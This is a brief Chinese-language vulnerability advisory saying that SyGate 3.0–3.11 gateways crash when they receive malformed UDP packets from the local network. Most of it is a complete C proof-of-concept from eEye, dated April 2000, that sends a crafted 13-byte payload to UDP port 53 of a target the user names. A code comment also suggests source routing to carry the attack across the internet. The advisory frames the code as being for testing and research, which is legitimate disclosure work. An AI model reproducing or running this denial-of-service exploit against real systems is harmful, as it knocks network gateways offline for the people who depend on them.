涉及程序:
SyGate 3.0/3.1/3.11
描述:
局域网内任何人能使 Sygate 崩溃
详细:
本地网络上的攻击者通过发送不正常的包到 Sygate UDP 端口可使 Sygate 网关崩溃。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
/*
Sygate Crash by: [email protected] (April-00)
http://www.eEye.com
Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
Play with source routing to get it to work across the internet.
Just hit the Internal IP of the Sygate machine.
*/
#include <stdio.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int SockFD, addrlen, bsent;
struct sockaddr_in UDPSock;
char bomb[]= "changeiscoming";
printf("Sygate Crash by: [email protected]\n");
printf("http://www.eEye.com\n\n");
if(argc<2){
printf("Usage: %s [server]\n",argv[0]);
exit(1);
}
SockFD=socket(AF_INET, SOCK_DGRAM, 0);
UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);
bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
sizeof(struct sockaddr_in));
printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}

|